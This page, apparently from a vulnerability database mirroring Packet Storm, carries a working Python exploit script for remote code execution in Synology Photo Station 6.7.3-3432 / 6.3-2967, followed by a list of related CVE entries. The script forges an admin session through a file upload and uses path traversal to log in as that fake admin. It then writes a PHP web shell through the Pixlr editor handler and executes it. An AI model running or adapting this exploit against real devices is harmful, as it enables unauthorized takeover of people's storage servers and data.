Lucene search
K
Database
Vendors
Products
Years
CVSS
Scanner
Agent Scanning
API Scanning
Manual Audit
Perimeter Scanner
Scanning
Projects
Email
Webhook
Plugins
Resources
Documents
Blog
Glossary
FAQ
Pricing
Contacts
About Us
Partners
Branding Guideline
packetstormKacper SzurekPACKETSTORM:143745
HistoryAug 08, 2017 - 12:00 a.m.

Synology Photo Station 6.7.3-3432 / 6.3-2967 Remote Code Execution

2017-08-0800:00:00
Kacper Szurek
packetstormsecurity.com
33

0.803 High

EPSS

Percentile

98.3%

JSON
`'''  
Source: https://blogs.securiteam.com/index.php/archives/3356  
  
Vulnerability details  
The remote code execution is a combination of 4 different vulnerabilities:  
  
Upload arbitrary files to the specified directories  
Log in with a fake authentication mechanism  
Log in to Photo Station with any identity  
Execute arbitrary code by authenticated user with administrator privileges  
The chain of vulnerabilities will allow you, in the end, to execute code as:  
  
uid=138862(PhotoStation) gid=138862(PhotoStation) groups=138862(PhotoStation)  
'''  
import requests  
  
# What server you want to attack  
synology_ip = 'http://192.168.1.100'  
  
# Your current IP  
ip = '192.168.1.200'  
  
# PHP code you want to execute  
php_to_execute = '<?php echo system("id"); ?>'  
  
encoded_session = 'root|a:2:{s:19:"security_identifier";s:'+str(len(ip))+':"'+ip+'";s:15:"admin_syno_user";s:7:"hlinak3";}'  
  
print "[+] Set fake admin sesssion"  
file = [('file', ('foo.jpg', encoded_session))]  
  
r = requests.post('{}/photo/include/synotheme_upload.php'.format(synology_ip), data = {'action':'logo_upload'}, files=file)  
print r.text  
  
print "[+] Login as fake admin"  
  
# Depends on version it might be stored in different dirs  
payload = {'session': '/../../../../../var/packages/PhotoStation/etc/blog/photo_custom_preview_logo.png'}  
# payload = {'session': '/../../../../../var/services/photo/@eaDir/SYNOPHOTO_THEME_DIR/photo_custom_preview_logo.png'}  
  
try_login = requests.post('{}/photo/include/file_upload.php'.format(synology_ip), params=payload)  
  
whichact = {'action' : 'get_setting'}  
r = requests.post('{}/photo/admin/general_setting.php'.format(synology_ip), data=whichact, cookies=try_login.cookies)  
print r.text  
  
print "[+] Upload php file"  
  
c = {'action' : 'save', 'image' : 'data://text/plain;base64,'+php_to_execute.encode('base64'), 'path' : '/volume1/photo/../../../volume1/@appstore/PhotoStation/photo/facebook/exploit'.encode("base64"), 'type' : 'php'}  
r = requests.post('{}/photo/PixlrEditorHandler.php'.format(synology_ip), data=c, cookies=try_login.cookies)  
print r.text  
  
  
print "[+] Execute payload"  
f = requests.get('{}/photo/facebook/exploit.php'.format(synology_ip))  
  
print f.text  
  
`

Related

openvas 2
seebug 2
zdt 1
cvelist 5
cve 5
nvd 5
prion 5
checkpoint_advisories 1
openvas
openvas
Synology Photo Station Multiple Vulnerabilities
2017-08-15 00:00:00
Synology Photo Station Detection
2015-05-26 00:00:00
seebug
seebug
Synology Photo Station 6.7.3-3432 / 6.3-2967 - Remote Code Execution
2017-09-29 00:00:00
Synology Photo Station Unauthenticated Remote Code Execution
2017-08-08 00:00:00
zdt
zdt
Synology Photo Station 6.7.3-3432 / 6.3-2967 - Remote Code Execution Exploit
2017-08-08 00:00:00
cvelist
cvelist
CVE-2017-11152
2017-07-31 00:00:00
CVE-2017-11155
2017-07-31 00:00:00
CVE-2017-11151
2017-07-31 00:00:00
cve
cve
CVE-2017-11154
2017-08-08 15:29:07
CVE-2017-11151
2017-08-08 15:29:07
CVE-2017-11153
2017-08-08 15:29:07
nvd
nvd
CVE-2017-11151
2017-08-08 15:29:07
CVE-2017-11155
2017-08-08 15:29:07
CVE-2017-11152
2017-08-08 15:29:07
prion
prion
Unrestricted file upload
2017-08-08 15:29:00
Deserialization of untrusted data
2017-08-08 15:29:00
Information disclosure
2017-08-08 15:29:00
checkpoint_advisories
checkpoint_advisories
Synology Photo Station Arbitrary File Upload (CVE-2017-11151) - Ver2
2018-04-22 00:00:00

0.803 High

EPSS

Percentile

98.3%

JSON
Related for PACKETSTORM:143745
openvas2seebug2zdt1cvelist5cve5nvd5prion5checkpoint_advisories1